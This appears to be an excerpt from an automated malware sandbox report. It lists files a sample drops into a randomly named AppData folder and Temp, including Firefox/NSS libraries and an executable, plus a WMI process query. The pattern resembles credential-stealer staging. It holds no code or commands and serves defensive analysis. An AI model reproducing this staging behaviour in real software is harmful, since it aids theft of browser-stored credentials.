file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ucrtbase.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\libEGL.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-handle-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssckbi.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\nssdbm3.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\lgpllibs.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\wG3cB0qZ3rM5x\ldap60.dll |
file | C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2364) |